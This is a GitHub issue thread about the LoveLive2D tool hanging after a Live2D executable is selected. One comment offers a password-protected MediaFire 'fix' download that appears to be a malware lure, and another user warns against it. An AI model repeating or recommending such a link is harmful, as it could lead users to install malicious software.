### ISSUE TITLE
not sure how to proceed

### ISSUE THREAD

**Issue by distantsands** [kiraio-moe/LoveLive2D#17]
I've done all the steps correctly, I think? Downloaded all necessary files and programs, both .Net 60 and .Net 80 because I wasn't sure which one I needed, and Live 2D 5.1. But the terminal doesn't seem to be doing anything after I selected the Live 2D .exe file, even when I ran it as admin. Am I missing something? Really sorry if this is a silly question, but I'm so lost :'(
![bruh](https://github.com/user-attachments/assets/0480c997-2da0-414d-b622-b4fb9ddeb14b)

**Comment by distantsands** [comment]
If the problem is trying to select it twice, I did close the terminal and reopened the application, selected only once, and left it running for 15 minutes, but nothing happened

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by distantsands** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

somehow im not sure the files you sent will work for this o-o;;

**Comment by ThatKoza** [comment]
> > to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."
> 
> somehow im not sure the files you sent will work for this o-o;;

Please, do not download this.
![IMG_7465](https://github.com/user-attachments/assets/631b9004-a4de-4867-bd4b-b1f16ea2e4eb)

**Comment by kiraio-moe** [comment]
@distantsands Can you try using the updated version? If it's still failed, try executing the program using CLI (the guide is in the README).
